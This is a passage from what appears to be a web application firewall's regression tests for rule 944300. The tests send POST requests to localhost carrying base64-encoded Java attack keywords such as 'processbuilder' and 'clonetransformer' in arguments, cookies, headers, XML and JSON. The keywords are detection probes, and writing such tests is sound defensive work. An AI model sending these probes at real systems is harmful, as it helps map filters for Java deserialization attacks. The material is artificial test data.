"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-35 
- desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvY2Vzc2J1aWxkZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-36 - desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-37 - desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-38 - desc: "XML attribute value includes keyword 
cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-39 - desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-40 - desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-41 - desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 
Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-42 - desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-43 - desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-44 - desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-45 - desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-46 - desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-47 - desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-48 - desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-49 - desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-50 - desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-51 - desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-52 - desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-53 - desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-54 - desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-55 - desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-56 - desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-57 - desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-58 - desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-59 - desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-60 - desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-61 - desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-62 - desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id 
\"944300\"" - - - - test_title: 944300-63 - desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-64 - desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-65 - desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-66 - desc: "Argument test includes 
keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-67 - desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-68 - desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-69 - desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-70 - desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-71 - desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-72 - desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-73 - desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-74 - desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-75 - desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-76 - desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-77 - desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 